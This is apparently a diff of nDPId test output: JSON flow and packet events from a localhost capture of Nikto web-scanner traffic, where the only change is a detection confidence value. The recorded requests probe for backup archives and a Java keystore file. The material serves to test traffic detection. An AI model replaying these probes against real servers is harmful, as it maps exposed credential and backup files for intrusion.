+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1576420277173,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277173,"pkt":"AAAAAAAAAAAAAAAACABFAADBJThAAEAGFv1\/AAABfwAAAcP4H5BkXx28+RQoaIAYAED+tQAAAQEICp1m\/N2dZvzdR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1576420277175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277175,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/vR9AAEAGfxd\/AAABfwAAAcP6H5AAgoWRJHk9poAYAED+swAAAQEICp1m\/N+dZvzfR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1576420277176,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277176,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/G85AAEAGIGl\/AAABfwAAAcP8H5A9SCNDeIAPvYAYAED+swAAAQEICp1m\/OCdZvzgR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1576420277177,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277177,"pkt":"AAAAAAAAAAAAAAAACABFAADAz0lAAEAGbOx\/AAABfwAAAcP+H5CCs\/fKIUNf1IAYAED+tAAAAQEICp1m\/OGdZvzhR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1576420277179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277179,"pkt":"AAAAAAAAAAAAAAAACABFAADAZxxAAEAG1Rl\/AAABfwAAAcQAH5BgPl+VSob0sYAYAED+tAAAAQEICp1m\/OOdZvzjR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1576420277180,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277180,"pkt":"AAAAAAAAAAAAAAAACABFAADGTHlAAEAG77Z\/AAABfwAAAcQCH5A4KXT5upP6C4AYAED+ugAAAQEICp1m\/OSdZvzkR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1576420277183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277183,"pkt":"AAAAAAAAAAAAAAAACABFAADGDUpAAEAGLuZ\/AAABfwAAAcQEH5BEmzXIVOhE3IAYAED+ugAAAQEICp1m\/OadZvzmR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1576420277184,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277184,"pkt":"AAAAAAAAAAAAAAAACABFAADAdAhAAEAGyC1\/AAABfwAAAcQGH5BYeUyXBV+uwoAYAED+tAAAAQEICp1m\/OidZvzoR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 